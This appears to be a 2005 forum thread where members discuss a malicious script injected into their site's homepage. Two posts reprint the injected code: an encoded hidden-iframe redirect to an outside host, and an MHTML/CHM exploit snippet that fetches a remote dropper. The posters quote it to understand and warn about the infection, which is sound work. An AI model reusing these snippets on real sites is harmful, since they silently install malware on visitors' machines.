Suspicious activity stopped, code Yellow/Blackwatch Plaid

cyco vision · Post by **cyco vision** » Sat Aug 13, 2005 2:05 pm

Any news on who did this?

I'm thinking it was one of those hack schemes that exploit phpbb in general.

Meaning maybe more independent boards got this too?

Post by **SpongeBuell** » Sat Aug 13, 2005 2:07 pm

Nope, I'm thinking it's a random hacker with no life

sam fisher · Post by **sam fisher** » Sat Aug 13, 2005 2:29 pm

because its not just the forum.

vb_master · Post by **vb_master** » Sat Aug 13, 2005 5:56 pm

The homepage has the virus, don't go there.

bioniclebert · Post by **bioniclebert** » Sat Aug 13, 2005 6:24 pm

I just got hit Really bad and i think I MAy refffffffformat my hard drive (just got a new mootherboard anyway..
my keey bbbboard is a piece of trash

EDIT: I borrowed a new keyboard. If anyone has downloaded this virus, please contact me on a shure way to delete it. I do not like my background or the new "Programs"

HK-47 · Post by **HK-47** » Sat Aug 13, 2005 6:45 pm

type this into your adress bar to see what the script really says. (This wont do anything bad.)
javascript:alert(String.fromCharCode(100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,73,70,82,65,77,69,32,83,82,67,61,34,104,116,116,112,58,47,47,119,119,119,46,103,108,111,98,111,108,111,111,107,46,99,111,109,47,118,52,50,55,47,119,111,119,46,104,116,109,108,34,32,87,73,68,84,72,61,49,32,72,69,73,71,72,84,61,49,62,60,47,73,70,82,65,77,69,62,39,41))
A popup box will say what the numbers really mean. Make sure you dont put eval() in there!

HK-47 · Post by **HK-47** » Sat Aug 13, 2005 6:50 pm

Code: Select all

<TEXTAREA id=cxw style="DISPLAY: none">
<object data="${PR}" type="text/x-scriptlet" width="0" height="0"></object>
</TEXTAREA>
<SCRIPT>document.write(cxw.value.replace("${PR}","ms-its:mhtml:file://c:\default.mht!http://www.wearehosters.com/v427/dropper.chm::/xxx.html"));
</SCRIPT>

Thats what the code on the site the site is... Its some exploit... Ill check if milw0rm or similar has anything on it.

Lucretius · Post by **Lucretius** » Sat Aug 13, 2005 6:57 pm

documemt.write('<IFRAME SRC="http://www.globolook.com/v427/wow.htnl"WIDTH=1 HIGHT=1></IFRAME>')

goodie · Post by **goodie** » Sat Aug 13, 2005 7:00 pm

My computer doesn't seem to affected at all. I did a virus check and as usual, it came up clean.

Thanks, Firefox!

bioniclebert · Post by **bioniclebert** » Sat Aug 13, 2005 7:49 pm

Status: Hard drive reformatted.
Windows re installed
Finally getting to go to Ytmnd without accidently clicking on benheck-waiting...
I must warn you, This virus is not fun. Whatever you do, just dont get it.

Trv · Post by **Trv** » Sat Aug 13, 2005 8:35 pm

I have norton upto date and have not recieved a warning. Plus I have Fire fox and never visit the homepage. So I assume Im safe.

But what actully does this virus/trojan do to your computer those who got it?

bioniclebert · Post by **bioniclebert** » Sat Aug 13, 2005 8:37 pm

Trv wrote:I have norton upto date and have not recieved a warning. Plus I have Fire fox and never visit the homepage. So I assume Im safe.

But what actully does this virus/trojan do to your computer those who got it?

it downloads "programs" and changes your background. It also gives you a warning that youve downloaded spyware( as if you didnt know)

Trv · Post by **Trv** » Sat Aug 13, 2005 8:42 pm

So basicly, youd know if you got it?

bioniclebert · Post by **bioniclebert** » Sat Aug 13, 2005 8:45 pm

Trv wrote:So basicly, youd know if you got it?

oh yes, it'd be VERY appearent.

vb_master · Post by **vb_master** » Sun Aug 14, 2005 6:17 am

I got Exploit-MhtRedir.gen, and I did not know that I had it untill McAffe told me (one second later). What does it do?